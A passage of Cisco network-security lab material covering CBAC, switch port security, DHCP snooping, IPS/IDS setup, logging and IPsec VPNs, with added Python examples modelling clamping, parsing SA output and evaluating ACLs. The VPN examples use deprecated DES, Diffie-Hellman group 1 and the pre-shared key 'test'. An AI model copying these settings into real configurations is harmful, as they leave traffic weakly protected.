(Router 1) for an example of a router which implements these CBACs.
Global timeouts and thresholds
The main limits that are defined are:

ip inspect tcp synwait-time. This defines how long the router waits for a TCP connection to
reach the established state before it is dropped. Default: 30 seconds.
ip inspect tcp finwait-time. This defines the time after a FIN flag for a connection to be
dropped. Default: 5 seconds.
ip inspect tcp idle-time. This defines the length of time that a TCP connection can be idle.
Default: 1 hour.
ip inspect dns-timeout. This defines the time-out for a DNS query. Default: 5 seconds.
ip inspect max-incomplete high. This defines the maximum number of half-open
connections before the router starts to delete them one-by-one. Default: 500.
ip inspect max-incomplete low. This defines the lower limit for the half-open connections,
below which the router stops deleting them. Default: 400.
ip inspect one-minute high. This defines the maximum number of new half-open
connections in a minute before the router starts to delete them one-by-one. Default: 500 per
minute.
ip inspect one-minute low. This defines the lower limit for the half-open connections over
a minute, below which deletion stops. Default: 400.
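
The watermark behaviour described above, as an added runnable Python model (this is example code written for this page, not Cisco IOS code and not part of the NetworkSims text): once the half-open count rises above the max-incomplete high value, or the number of new half-open sessions in the last minute rises above the one-minute high value, each new SYN causes one existing half-open session to be deleted, and this continues until both counts are back below their low values. The event format, the constructed trace, the eviction of the oldest half-open session first and the small thresholds used in the run are assumptions of the model.

```python
from collections import OrderedDict, deque

# TCP flags the model reacts to (constructed vocabulary for the event trace).
SYN, ACK, FIN, RST = "SYN", "ACK", "FIN", "RST"


class HalfOpenInspector:
    """Tracks half-open TCP sessions and clamps them with high/low watermarks.

    max_incomplete_high/low mirror 'ip inspect max-incomplete high/low' and
    one_minute_high/low mirror 'ip inspect one-minute high/low'. The defaults
    are the IOS defaults listed above (500 / 400).
    """

    def __init__(self, max_incomplete_high=500, max_incomplete_low=400,
                 one_minute_high=500, one_minute_low=400):
        self.max_incomplete_high = max_incomplete_high
        self.max_incomplete_low = max_incomplete_low
        self.one_minute_high = one_minute_high
        self.one_minute_low = one_minute_low
        self.half_open = OrderedDict()  # session -> time of its SYN, oldest first
        self.established = set()
        self.syn_times = deque()        # timestamps of connection attempts
        self.clamping = False
        self.deleted = 0

    def _attempts_in_last_minute(self, now):
        while self.syn_times and now - self.syn_times[0] >= 60:
            self.syn_times.popleft()
        return len(self.syn_times)

    def process(self, now, src, dst, flag):
        # One key per session, whichever side sent the segment.
        key = frozenset((src, dst))
        if flag == SYN:
            self.syn_times.append(now)
            self.half_open.setdefault(key, now)
            if (len(self.half_open) > self.max_incomplete_high
                    or self._attempts_in_last_minute(now) > self.one_minute_high):
                self.clamping = True
            if self.clamping and len(self.half_open) > 1:
                # Make room for the new request by deleting the oldest half-open
                # session (assumed eviction order), one per new SYN.
                self.half_open.popitem(last=False)
                self.deleted += 1
        elif flag == ACK and key in self.half_open:
            # The client's ACK completes the three-way handshake.
            del self.half_open[key]
            self.established.add(key)
        elif flag in (FIN, RST):
            self.half_open.pop(key, None)
            self.established.discard(key)
        # Clamping ends only once both counts are back below their low watermarks.
        if (self.clamping and len(self.half_open) < self.max_incomplete_low
                and self._attempts_in_last_minute(now) < self.one_minute_low):
            self.clamping = False


SERVER = "10.0.0.10:80"
TRACE = []  # constructed event trace: (seconds, source, destination, flag)
for i in range(1, 8):
    # Seven clients start a handshake; none of them has completed it yet.
    TRACE.append((i, f"192.168.1.{i}:4000", SERVER, SYN))
for i in (3, 4, 5):
    # Three of them finish the handshake with their ACK.
    TRACE.append((10 + i, f"192.168.1.{i}:4000", SERVER, ACK))
TRACE.append((20, "192.168.1.8:4000", SERVER, SYN))  # one more attempt afterwards


def run_trace(events, **thresholds):
    """Feed a trace through an inspector and return it for examination."""
    inspector = HalfOpenInspector(**thresholds)
    for now, src, dst, flag in events:
        inspector.process(now, src, dst, flag)
    return inspector


if __name__ == "__main__":
    # Deliberately small watermarks so the clamping shows in a handful of events.
    insp = run_trace(TRACE, max_incomplete_high=5, max_incomplete_low=3,
                     one_minute_high=100, one_minute_low=80)
    print(f"half-open={len(insp.half_open)} established={len(insp.established)} "
          f"deleted={insp.deleted} clamping={insp.clamping}")
    # prints: half-open=3 established=3 deleted=2 clamping=False
```

With the IOS defaults the same trace causes no clamping at all; the run in the block uses max-incomplete 5/3 so that the sixth and seventh SYNs each evict one older half-open session, and clamping is released once three handshakes complete. Swapping the thresholds so that the one-minute watermarks are the small ones shows the rate limit firing instead, and staying in force because the attempts remain inside the sixty-second window.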

For example, to limit the maximum number of half-open sessions at any time to between 900
and 1100:

(config)# ip inspect ?
  alert-off       Disable alert
  audit-trail     Enable the logging of session information (addresses and
                  bytes)
  dns-timeout     Specify timeout for DNS
  max-incomplete  Specify maximum number of incomplete connections before
                  clamping
  name            Specify an inspection rule
  one-minute      Specify one-minute-sample watermarks for clamping
  tcp             Config timeout values for tcp connections
  udp             Config timeout values for udp flows
  <cr>
(config)# ip inspect tcp ?
  finwait-time    Specify timeout for TCP connections after a FIN
  idle-time       Specify idle timeout for tcp connections
  max-incomplete  Specify max half-open connection per host
  synwait-time    Specify timeout for TCP connections after a SYN and no
                  further data
(config)# ip inspect max-incomplete low 900
(config)# ip inspect max-incomplete high 1100

and for the maximum number of half-open sessions in one minute:

(config)# ip inspect one-minute low 900
(config)# ip inspect one-minute high 1100

To remove an ip inspect setting and return it to its default, use the no form of the command,
for example:

(config)# no ip inspect one-minute low

To limit the DNS timeout to 10 seconds:

(config)# ip inspect dns-timeout 10

Cisco Router Challenge 191

Outline
This challenge involves the configuration of Context-based Access Control (CBAC) inspection
rules, with timeouts, alerts and audit trails.
Objectives
The objectives of this challenge are to:

Set up a CBAC inspection rule.
Define the protocols which the CBAC rule applies to.

Example
> en
# config t
(config)# ip inspect name cisco ?
  cuseeme      CUSeeMe Protocol
  fragment     IP fragment inspection
  ftp          File Transfer Protocol
  h323         H.323 Protocol (e.g, MS NetMeeting, Intel Video Phone)
  http         HTTP Protocol
  netshow      Microsoft NetShow Protocol
  rcmd         R commands (r-exec, r-login, r-sh)
  realaudio    Real Audio Protocol
  rpc          Remote Prodedure Call Protocol
  rtsp         Real Time Streaming Protocol
  smtp         Simple Mail Transfer Protocol
  sqlnet       SQL Net Protocol
  streamworks  StreamWorks Protocol
  tcp          Transmission Control Protocol
  tftp         TFTP Protocol
  udp          User Datagram Protocol
  vdolive      VDOLive Protocol
(config)# ip inspect name cisco icmp ?
  alert        Turn on/off alert
  audit-trail  Turn on/off audit trail
  timeout      Specify the inactivity timeout time
  <cr>
(config)# ip inspect name cisco icmp timeout ?
  <5-43200>  Timeout in seconds
(config)# ip inspect name cisco icmp timeout 10
(config)# ip inspect name cisco http ?
  alert        Turn on/off alert
  audit-trail  Turn on/off audit trail
  java-list    Specify a standard access-list to apply the Java blocking. If
               specified, MUST appear directly after option "http"
  timeout      Specify the inactivity timeout time
  urlfilter    Specify URL filtering for HTTP traffic
  <cr>
(config)# ip inspect nam cisco http alert ?
  off  Turn off alert
  on   Turn on alert
(config)# ip inspect nam cisco http alert off
(config)# ip inspect name cisco ftp ?
  alert        Turn on/off alert
  audit-trail  Turn on/off audit trail
  timeout      Specify the inactivity timeout time
  <cr>
(config)# ip inspect name cisco ftp audit-trail ?
  off  Turn off audit trail
  on   Turn on audit trail
(config)# ip inspect name cisco ftp audit-trail on
(config)# ip inspect udp idle-time 50
(config)# ip inspect tcp idle-time 500
(config)# int s0
(config-if)# ip inspect ?
  WORD  Name of inspection defined
(config-if)# ip inspect cisco ?
  in   Inbound inspection
  out  Outbound inspection
(config-if)# ip inspect cisco in
(config-if)# exit

Cisco Switch Challenge 49

Outline
This challenge involves enabling port security and BPDU guard (to defend against
spanning-tree attacks).
Objectives
The objectives of this challenge are to:

Enable BPDU guard.
Enable port-security.
Define a maximum number of MAC addresses on a port.
Define a MAC address on a port.

Example
> en
# config t
Switch(config)# spanning-tree ?
  backbonefast  Enable BackboneFast Feature
  etherchannel  Spanning tree etherchannel specific configuration
  extend        Spanning Tree 802.1t extensions
  loopguard     Spanning tree loopguard options
  mode          Spanning tree operating mode
  mst           Multiple spanning tree configuration
  pathcost      Spanning tree pathcost options
  portfast      Spanning tree portfast options
  uplinkfast    Enable UplinkFast Feature
  vlan          VLAN Switch Spanning Tree
Switch(config)# spanning-tree portfast ?
  bpdufilter  Enable portfast bdpu filter on this switch
  bpduguard   Enable portfast bpdu guard on this switch
  default     Enable portfast by default on all access ports
Switch(config)# spanning-tree portfast bpduguard ?
  default  Enable bdpu guard by default on all portfast ports
Switch(config)# spanning-tree portfast bpduguard def ?
  <cr>
Switch(config)# spanning-tree portfast bpduguard def
Switch(config)# int fa0/1
Switch(config-if)# sw po ?
  aging        Port-security aging commands
  mac-address  Secure mac address
  maximum      Max secure addrs
  violation    Security Violation Mode
  <cr>
Switch(config-if)# switchport mode access
Switch(config-if)# switchport port-security
Switch(config-if)# switchport port-security max ?
  <1-5120>  Maximum addresses
Switch(config-if)# switchport port-security maximum 5
Switch(config-if)# switchport port-security mac-address ?
  H.H.H   48 bit mac address
  sticky  Configure dynamic secure addresses as sticky
Switch(config-if)# switchport port-security mac-address 0000.1111.2222

Cisco Switch Challenge 50

Outline
This challenge involves defending against an attacker depleting the DHCP pool using
DHCP snooping.
Objectives
The objectives of this challenge are to:

Enable DHCP snooping.
Apply DHCP snooping on an interface.

Example
> en
# config t
Switch(config)# ip dhcp ?
  conflict                   DHCP address conflict parameters
  database                   Configure DHCP database agents
  excluded-address           Prevent DHCP from assigning certain addresses
  limited-broadcast-address  Use all 1's broadcast address
  ping                       Specify ping parameters used by DHCP
  pool                       Configure DHCP address pools
  relay                      DHCP relay agent parameters
  smart-relay                Enable Smart Relay feature
  snooping                   DHCP Snooping
Switch(config)# ip dhcp snooping ?
  information  DHCP Snooping information
  vlan         DHCP Snooping vlan
  <cr>
Switch(config)# ip dhcp snooping
Switch(config)# ip dhcp snooping vlan ?
  <1-4094>  DHCP Snooping vlan first number
Switch(config)# ip dhcp snooping vlan 4
Switch(config)# int fa0/1
Switch(config-if)# switchport mode access
Switch(config-if)# ip dhcp ?
  snooping  DHCP Snooping
Switch(config-if)# ip dhcp snooping ?
  limit  DHCP Snooping limit
  trust  DHCP Snooping trust config
Switch(config-if)# ip dhcp snooping trust
Switch(config-if)# ip dhcp snooping limit ?
  rate  DHCP Snooping limit
Switch(config-if)# ip dhcp snooping limit rate ?
  <1-4294967294>  DHCP snooping rate limit
Switch(config-if)# ip dhcp snooping limit rate 30

Cisco PIX Challenge 54


Outline
This challenge involves configuring FTP and MGCP inspection.
Objectives
The objectives of this challenge are to:

Define FTP and MGCP inspection.

Example
pixfirewall(config)# ftp-map ftpm
pixfirewall(config-ftp-map)# ?
Ftp-map configuration commands:
  mask-syst-reply  Mask reply to syst command
  no               Negate a command or set its defaults
  request-command  FTP request command inspection
pixfirewall(config-ftp-map)# mask- ?
ftp-map mode commands/options:
  <cr>
pixfirewall(config-ftp-map)# re ?
ftp-map mode commands/options:
  deny  Specify FTP request commands to block
pixfirewall(config-ftp-map)# re den ?
ftp-map mode commands/options:
  appe  Append to a file
  cdup  Change to parent of current directory
  dele  Delete a file at server site
  get   FTP client command for the retr command - retrieve a file
  help  Help information from server
  mkd   Create a directory
  put   FTP client command for the stor command - store a file
  rmd   Remove a directory
  rnfr  Rename from
  rnto  Rename to
  site  Specify server specific command
  stou  Store a file with a unique name
pixfirewall(config-ftp-map)# exit
pixfirewall(config)# mgcp-map mmap
pixfirewall(config-mgcp-map)# ?
mgcp-map configuration commands:
  call-agent     Add a Call-Agent
  command-queue  Configure Command Queue
  gateway        Add a Gateway
  help           Help for mgcp-map configuration commands
  no             Negate or set default values of a command
pixfirewall(config-mgcp-map)# call ?
mgcp-map mode commands/options:
  A.B.C.D  IP address
pixfirewall(config-mgcp-map)# gat ?
mgcp-map mode commands/options:
  A.B.C.D  IP address

PIX/ASA Test
End of unit test
Take the on-line test, go to:
http://networksims.com/e_ns.html
Key facts
Not available in this version.

Network Security 1
End of unit test
Take the on-line test, go to:
http://networksims.com/e_ns2.htm
Key facts
Not available in this version.

20 Cisco Academy Network Security 2

Cisco Router Challenge 192

Outline
This challenge involves downloading an IPS signature file and using it.
Objectives
The objectives of this challenge are to:

Download an IPS signature file.
Apply it.
Define logging.

Example
> en
# copy tftp://10.0.0.1/new.sdf flash:new.sdf
# config t
(config)# ip ips ?
  deny-action  Specify Deny action
  fail         Specify what to do during any failures
  name         Specify an IPS rule
  notify       Specify the notification mechanisms (SDEE, nr-director or log)
               for the alarms
  sdf          Specify the location of the signature definition file
  signature    Add a policy to a signature
(config)# ip ips na ?
  WORD  Name of IPS rule
(config)# ip ips na TEST ?
  list  Specify an access list to match
  <cr>
(config)# ip ips name TEST
(config)# ip ips sd ?
  builtin   Use the built in signature definition file
  location  Location of the signature definition file
(config)# ip ips sdf location ?
  WORD  URL of the signature definition file
(config)# ip ips sdf location flash:attack-drop.sdf
(config)# int e0
(config-if)# ip ips ?
  WORD  Name of defined IPS rule
(config-if)# ip ips TEST ?
  in   Inbound IPS
  out  Outbound IPS
(config-if)# ip ips TEST in
(config-if)# exit
(config)# logging ?
  Hostname or A.B.C.D  IP address of the logging host
  buffered             Set buffered logging parameters
  cns-events           Set CNS Event logging level
  console              Set console logging parameters
  count                Count every log message and timestamp last occurrence
  exception            Limit size of exception flush output
  facility             Facility parameter for syslog messages
  history              Configure syslog history table
  host                 Set syslog server IP address and parameters
  monitor              Set terminal line (monitor) logging parameters
  on                   Enable logging to all enabled destinations
  origin-id            Add origin ID to syslog messages
  rate-limit           Set messages per second limit
  reload               Set reload logging level
  server-arp           Enable sending ARP requests for syslog servers when
                       first configured
  source-interface     Specify interface for source address in logging
                       transactions
  trap                 Set syslog server logging level
(config)# logging on
(config)# logging 212.72.52.7
(config)# logging buffer ?
  <0-7>              Logging severity level
  <4096-2147483647>  Logging buffer size
  alerts             Immediate action needed           (severity=1)
  critical           Critical conditions               (severity=2)
  debugging          Debugging messages                (severity=7)
  emergencies        System is unusable                (severity=0)
  errors             Error conditions                  (severity=3)
  informational      Informational messages            (severity=6)
  notifications      Normal but significant conditions (severity=5)
  warnings           Warning conditions                (severity=4)
  xml                Enable logging in XML to XML logging buffer
  <cr>
(config)# logging buffer 440240
(config)# logging host 138.24.170.8
(config)# logging trap emergency
(config)# logging monitor emergency
(config)# logging console emergency
(config)# logging buffer emergency

In this case trap messages are sent to the syslog servers defined with the logging and
logging host commands, but because the trap level is set to emergency only messages of
severity 0 (system is unusable) are forwarded; anything less severe is not sent.

Cisco PIX Challenge 34

Outline
This challenge involves the configuration of IDS signatures.
Objectives
The objectives of this challenge are to:

Define IP audit rules.
Remove IDS signatures.

Example
myPIX # config t
myPIX (config)# help ip
USAGE:
ip local pool <poolname> <ip1>[-<ip2>] [mask <netmask>]
ip verify reverse-path interface <if_name>
ip audit {info|attack} action [alarm] [drop] [reset]
ip audit name <audit_name> {info|attack} [action [alarm] [drop] [reset]]
ip audit interface <if_name> <audit_name>
ip audit signature <sig_number> disable
show|clear ip audit count [global] [interface <interface>]
clear configure ip audit [configuration]
DESCRIPTION:
ip               Define a local address pool
                 Configure Unicast RPF on an interface
                 Configure the Intrusion Detection System
SYNTAX:
<poolname>       name of the local address pool
<ip1>-[<ip2>]    address range of the local address pool
<netmask>        network mask of the local address pool
<if_name>        The name designated for the interface by the nameif command
info             IDS informational signatures.
attack           IDS attack signatures.
alarm            When a signature match is detected, report the event
                 to syslog servers.
drop             When a signature match is detected, drop the offending
                 packet.
reset            When a signature match is detected, drop the offending
                 packet and close the connection if it is part of an
                 active connection.
<audit_name>     Audit policy name.
<sig_number>     IDS signature number.
see also:        interface, ip address (interface sub-mode command),
                 show interface, isakmp
myPIX (config)# ip audit info action alarm
myPIX (config)# ip audit attack action alarm
myPIX (config)# ip audit signature 1001 disable
myPIX (config)# ip audit signature 2001 disable
myPIX (config)# ip audit signature 3041 disable
myPIX (config)# ip audit signature 6100 disable
myPIX (config)# ip audit signature 6152 disable
myPIX (config)# logging ?
Usage: [no] logging on
       [no] logging timestamp
       [no] logging standby
       [no] logging host [<in_if>] <l_ip> [tcp|udp/port#] [format {emblem}]
       [no] logging console <level>
       [no] logging buffered <level>
       [no] logging monitor <level>
       [no] logging history <level>
       [no] logging trap <level>
       [no] logging message <syslog_id> level <level>
       [no] logging facility <fac>
       [no] logging device-id hostname | ipaddress <if_name>
                               | string <text>
       logging queue <queue_size>
       show logging [{message [<syslog_id>|all]} | level | disabled]
myPIX (config)# logging on
myPIX (config)# logging host 197.38.34.10
myPIX (config)# logging trap informational
myPIX (config)# logging monitor informational
myPIX (config)# logging console informational
myPIX (config)# logging buffer informational

Cisco Router Challenge 56

Outline
This challenge involves setting up IKE for a VPN connection.
Objectives
The objectives of this challenge are to:

Define the IKE policy.
Define encryption.
Define hash function.
Define authentication type.
Define identity type.
Define authentication key and address (for pre-share authentication).
Define the transform set.

Example
> en
# config t
(config)# crypto isakmp enable
(config)# crypto isakmp policy 111
(config-isakmp)# encryption des
(config-isakmp)# hash sha
(config-isakmp)# authentication pre-share
(config-isakmp)# group 1
(config-isakmp)# exit
(config)# crypto isakmp identity hostname
(config)# crypto isakmp key test address 192.168.1.1
(config)# crypto ipsec transform-set test esp-des

Cisco Router Challenge 57

Outline
This challenge involves setting up a crypto map and applying it to an interface.
Objectives
The objectives of this challenge are to:

Define a crypto access-list, to identify the traffic to encrypt.
Define IKE.
Define a crypto map.
Bind the ACL to the crypto map.
Apply the crypto map to E0.
Show the tunnel details.

Example
> en
# config t
(config)# hostname newhampshire
(config)# access-list 109 permit ip 50.93.142.0 0.0.255.255 136.163.130.0 0.0.255.255
(config)# crypto isakmp enable
(config)# crypto isakmp policy 111
(config-isakmp)# ?
ISAKMP commands:
  authentication  Set authentication method for protection suite
  default         Set a command to its defaults
  encryption      Set encryption algorithm for protection suite
  exit            Exit from ISAKMP protection suite configuration mode
  group           Set the Diffie-Hellman group
  hash            Set hash algorithm for protection suite
  lifetime        Set lifetime for ISAKMP security association
  no              Negate a command or set its defaults
(config-isakmp)# en ?
  3des  Three key triple DES
  aes   AES - Advanced Encryption Standard.
  des   DES - Data Encryption Standard (56 bit keys).
(config-isakmp)# encryption des
(config-isakmp)# hash ?
  md5  Message Digest 5
  sha  Secure Hash Standard
(config-isakmp)# hash sha
(config-isakmp)# authentication ?
  pre-share  Pre-Shared Key
  rsa-encr   Rivest-Shamir-Adleman Encryption
  rsa-sig    Rivest-Shamir-Adleman Signature
(config-isakmp)# authentication pre-share
(config-isakmp)# g ?
  1  Diffie-Hellman group 1
  2  Diffie-Hellman group 2
  5  Diffie-Hellman group 5
(config-isakmp)# group 1
(config-isakmp)# exit
(config)# crypto isakmp identity hostname
(config)# crypto isakmp key test address 192.168.1.1
(config)# crypto ipsec transform-set finland esp-des
(config)# crypto map Manchester 10 ipsec-isakmp
(config-crypto-map)# ?
Crypto Map configuration commands:
  default        Set a command to its defaults
  description    Description of the crypto map statement policy
  dialer         Dialer related commands
  exit           Exit from crypto map configuration mode
  match          Match values.
  no             Negate a command or set its defaults
  qos            Quality of Service related commands
  reverse-route  Reverse Route Injection.
  set            Set values for encryption/decryption
(config-crypto-map)# match ?
  address  Match address of packets to encrypt.
(config-crypto-map)# match address ?
  <100-199>    IP access-list number
  <2000-2699>  IP access-list number (expanded range)
  WORD         Access-list name
(config-crypto-map)# match address 109
(config-crypto-map)# set ?
  identity              Identity restriction.
  isakmp-profile        Specify isakmp Profile
  peer                  Allowed Encryption/Decryption peer.
  pfs                   Specify pfs settings
  security-association  Security association parameters
  transform-set         Specify list of transform sets in priority order
(config-crypto-map)# set peer 144.55.62.1
(config-crypto-map)# s t ?
  WORD  Proposal tag
(config-crypto-map)# set transform-set finland
(config-crypto-map)# exit
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shut
(config-if)# crypto map Manchester
(config-if)# exit
(config)# exit
# show crypto ipsec sa
interface: E0
    Crypto map tag: Manchester, local addr 192.168.1.1
    protected vrf: (none)
    local ident (addr/mask/prot/port): (50.93.0.0/255.255.0.0/0/0)
    remote ident (addr/mask/prot/port): (136.163.0.0/255.255.0.0/0/0)
    current_peer 192.168.1.1 port 500
      PERMIT, flags={origin_is_acl,}
     #pkts encaps: 43, #pkts encrypt: 43, #pkts digest: 43
     #pkts decaps: 43, #pkts decrypt: 43, #pkts verify: 43
     #pkts compressed: 0, #pkts decompressed: 0
     #pkts not compressed: 0, #pkts compr. failed: 0
     #pkts not decompressed: 0, #pkts decompress failed: 0
     #send errors 4, #recv errors 0
     local crypto endpt.: 192.168.1.1, remote crypto endpt.: 144.55.62.1
     path mtu 1500, ip mtu 1500, ip mtu idb E0
     current outbound spi: 0x267BC43(40352835)
     inbound esp sas:
      spi: 0xD9F4BC76(3656694902)
        transform: esp-des
        in use settings ={Tunnel, }
        conn id: 2001, flow_id: SW:1, crypto map: Manchester
        sa timing: remaining key lifetime (k/sec): (4558868/3550)
        IV size: 8 bytes
        replay detection support: Y
        Status: ACTIVE
     inbound ah sas:
     inbound pcp sas:
     outbound esp sas:
      spi: 0x267BC43(40352835)
        transform: esp-des
        in use settings ={Tunnel, }
        conn id: 2002, flow_id: SW:2, crypto map: Manchester
        sa timing: remaining key lifetime (k/sec): (4558868/3548)
        IV size: 8 bytes
        replay detection support: Y
        Status: ACTIVE
     outbound ah sas:
     outbound pcp sas:

# show crypto isakmp sa
dst             src             state          conn-id slot status
144.55.62.1     192.168.1.1     QM_IDLE              1    0 ACTIVE
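
To check the tunnel details shown above from a script rather than by eye, here is an added Python example (written for this page, not Cisco code and not part of the original text) that parses the show crypto ipsec sa output and reports the points an operator would want flagged: non-zero send errors, a missing or inactive ESP SA in either direction, replay detection switched off, and legacy transforms such as the esp-des used in this challenge. The input is the output above, abridged to the lines the parser reads; the field names of the returned dictionary and the list of legacy transforms are choices made for this example.

```python
import re

# Constructed input: the 'show crypto ipsec sa' output from the challenge above,
# abridged to the lines this parser reads.
SAMPLE_SHOW_CRYPTO_IPSEC_SA = """\
interface: E0
    Crypto map tag: Manchester, local addr 192.168.1.1
    current_peer 192.168.1.1 port 500
     #pkts encaps: 43, #pkts encrypt: 43, #pkts digest: 43
     #pkts decaps: 43, #pkts decrypt: 43, #pkts verify: 43
     #send errors 4, #recv errors 0
     current outbound spi: 0x267BC43(40352835)
     inbound esp sas:
      spi: 0xD9F4BC76(3656694902)
        transform: esp-des
        sa timing: remaining key lifetime (k/sec): (4558868/3550)
        replay detection support: Y
        Status: ACTIVE
     inbound ah sas:
     outbound esp sas:
      spi: 0x267BC43(40352835)
        transform: esp-des
        sa timing: remaining key lifetime (k/sec): (4558868/3548)
        replay detection support: Y
        Status: ACTIVE
     outbound ah sas:
"""

SA_HEADER = re.compile(r"(inbound|outbound) (esp|ah|pcp) sas:")
COUNTER = re.compile(r"#([a-z][a-z. ]*?)[: ]+(\d+)")  # '#pkts encaps: 43', '#send errors 4'


def parse_show_crypto_ipsec_sa(text):
    """Return interface, crypto map, peer, packet counters and per-direction SAs."""
    result = {"interface": None, "crypto_map": None, "local_addr": None, "peer": None,
              "counters": {}, "sas": {"inbound": [], "outbound": []}}
    direction = proto = current = None
    for raw in text.splitlines():
        line = raw.strip()
        header = SA_HEADER.match(line)
        if line.startswith("interface:"):
            result["interface"] = line.split(":", 1)[1].strip()
        elif line.startswith("Crypto map tag:"):
            tag, addr = re.match(r"Crypto map tag: (\S+), local addr (\S+)", line).groups()
            result["crypto_map"], result["local_addr"] = tag, addr
        elif line.startswith("current_peer"):
            result["peer"] = line.split()[1]
        elif line.startswith("#"):
            for name, value in COUNTER.findall(line):
                result["counters"][name] = int(value)
        elif header:
            direction, proto = header.groups()  # a new SA list starts, no SA selected yet
            current = None
        elif line.startswith("spi:") and direction:
            current = {"proto": proto, "spi": int(line.split()[1].split("(")[0], 16)}
            result["sas"][direction].append(current)
        elif current is not None:
            if line.startswith("transform:"):
                current["transform"] = line.split(": ", 1)[1]
            elif line.startswith("sa timing"):
                kb, sec = re.search(r"\((\d+)/(\d+)\)", line).groups()
                current["remaining_kb"], current["remaining_sec"] = int(kb), int(sec)
            elif line.startswith("replay detection support:"):
                current["replay_detection"] = line.endswith("Y")
            elif line.startswith("Status:"):
                current["status"] = line.split(": ", 1)[1]
    return result


# Transforms a reviewer would flag today: DES and 3DES are deprecated, MD5 is legacy.
LEGACY_TRANSFORMS = {"esp-des", "esp-3des", "esp-md5-hmac", "esp-null"}


def check_tunnel(sa):
    """Operational findings: send errors, missing or inactive ESP SAs, legacy transforms."""
    findings = []
    if sa["counters"].get("send errors", 0):
        findings.append(f"{sa['counters']['send errors']} send errors on {sa['interface']}")
    for direction in ("inbound", "outbound"):
        esp_sas = [s for s in sa["sas"][direction] if s["proto"] == "esp"]
        if not esp_sas:
            findings.append(f"no {direction} ESP SA")
        for s in esp_sas:
            if s.get("status") != "ACTIVE":
                findings.append(f"{direction} SPI {s['spi']:#x} is {s.get('status')}")
            if not s.get("replay_detection"):
                findings.append(f"{direction} SPI {s['spi']:#x} has replay detection off")
            if s.get("transform") in LEGACY_TRANSFORMS:
                findings.append(f"{direction} SPI {s['spi']:#x} uses legacy transform {s['transform']}")
    return findings


if __name__ == "__main__":
    for finding in check_tunnel(parse_show_crypto_ipsec_sa(SAMPLE_SHOW_CRYPTO_IPSEC_SA)):
        print(finding)
```

Run against the output above it reports the four send errors and the esp-des transform on both SAs; a tunnel whose peer never answers shows up instead as an outbound SA with no inbound counterpart, which the missing-SA check catches.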

Cisco Router Challenge 58

Outline
This challenge involves setting an access-list to allow IPSec.
Objectives
The objectives of this challenge are to:

Create an access-list which allows AHP, ESP and ISAKMP.
Apply the access-list.

Example
> en
# config t
(config)# hostname london
london (config)# access-list 101 permit ahp host 117.84.81.2 host 61.222.47.2
london (config)# access-list 101 permit esp host 117.84.81.2 host 61.222.47.2
london (config)# access-list 101 permit udp host 117.84.81.2 host 61.222.47.2 eq isakmp
london (config)# int e0
london (config-if)# ip address 136.22.25.1 255.252.0.0
london (config-if)# no shut
london (config-if)# ip access-group 101 in
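
An added Python example (not from the page) that evaluates IOS-style extended ACL entries with wildcard masks and the implicit deny at the end, using the three lines of access-list 101 above. It shows that AH (IP protocol 51), ESP (IP protocol 50) and ISAKMP (UDP port 500) from the peer are permitted, while anything else, including ESP from a different host and NAT-T on UDP 4500, is dropped by the implicit deny. The packet dictionary format and the sample packets are constructed for this example; the protocol and port numbers are the standard IANA assignments.

```python
from dataclasses import dataclass
from typing import Optional, Tuple

# IP protocol numbers for the keywords IOS accepts in extended ACLs.
PROTOCOL_NUMBERS = {"ahp": 51, "esp": 50, "udp": 17, "tcp": 6, "icmp": 1}
# Well-known port names IOS accepts after 'eq'.
PORT_NAMES = {"isakmp": 500}

Address = Tuple[str, str]  # (address, wildcard mask)


@dataclass(frozen=True)
class Ace:
    action: str                 # permit or deny
    protocol: str               # ip, ahp, esp, udp, tcp, icmp
    src: Address
    dst: Address
    dst_port: Optional[int] = None


def _parse_address(tokens, idx):
    """Parse 'host A', 'any' or 'A W' starting at tokens[idx]; return (spec, next_idx)."""
    if tokens[idx] == "host":
        return (tokens[idx + 1], "0.0.0.0"), idx + 2
    if tokens[idx] == "any":
        return ("0.0.0.0", "255.255.255.255"), idx + 1
    return (tokens[idx], tokens[idx + 1]), idx + 2


def parse_ace(line):
    """Parse one 'access-list <n> permit|deny <proto> <src> <dst> [eq <port>]' line."""
    tokens = line.split()
    if tokens[0] != "access-list":
        raise ValueError(f"not an access-list entry: {line!r}")
    action, protocol = tokens[2], tokens[3]
    src, idx = _parse_address(tokens, 4)
    dst, idx = _parse_address(tokens, idx)
    dst_port = None
    if idx < len(tokens) and tokens[idx] == "eq":
        port = tokens[idx + 1]
        dst_port = PORT_NAMES[port] if port in PORT_NAMES else int(port)
    return Ace(action, protocol, src, dst, dst_port)


def _ip_to_int(address):
    return int.from_bytes(bytes(int(octet) for octet in address.split(".")), "big")


def address_matches(spec, ip):
    """Wildcard-mask comparison: a 1 bit in the wildcard means 'don't care'."""
    address, wildcard = spec
    care = ~_ip_to_int(wildcard) & 0xFFFFFFFF
    return (_ip_to_int(ip) & care) == (_ip_to_int(address) & care)


def ace_matches(ace, packet):
    if ace.protocol != "ip" and PROTOCOL_NUMBERS[ace.protocol] != packet["proto"]:
        return False
    if ace.dst_port is not None and packet.get("dport") != ace.dst_port:
        return False
    return address_matches(ace.src, packet["src"]) and address_matches(ace.dst, packet["dst"])


def evaluate(acl, packet):
    """First matching entry wins; every IOS ACL ends with an implicit deny."""
    for ace in acl:
        if ace_matches(ace, packet):
            return ace.action
    return "deny"


# The three entries from the challenge above, exactly as typed on the router.
ACL_101 = [parse_ace(line) for line in (
    "access-list 101 permit ahp host 117.84.81.2 host 61.222.47.2",
    "access-list 101 permit esp host 117.84.81.2 host 61.222.47.2",
    "access-list 101 permit udp host 117.84.81.2 host 61.222.47.2 eq isakmp",
)]

# Constructed inbound packets on E0, each as (description, packet).
SAMPLE_PACKETS = [
    ("ESP from the peer", {"proto": 50, "src": "117.84.81.2", "dst": "61.222.47.2"}),
    ("AH from the peer", {"proto": 51, "src": "117.84.81.2", "dst": "61.222.47.2"}),
    ("ISAKMP from the peer", {"proto": 17, "src": "117.84.81.2", "dst": "61.222.47.2", "dport": 500}),
    ("NAT-T (UDP 4500) from the peer", {"proto": 17, "src": "117.84.81.2", "dst": "61.222.47.2", "dport": 4500}),
    ("ESP from another host", {"proto": 50, "src": "117.84.81.3", "dst": "61.222.47.2"}),
    ("ICMP from the peer", {"proto": 1, "src": "117.84.81.2", "dst": "61.222.47.2"}),
]

if __name__ == "__main__":
    for description, packet in SAMPLE_PACKETS:
        print(f"{description:32} -> {evaluate(ACL_101, packet)}")
```

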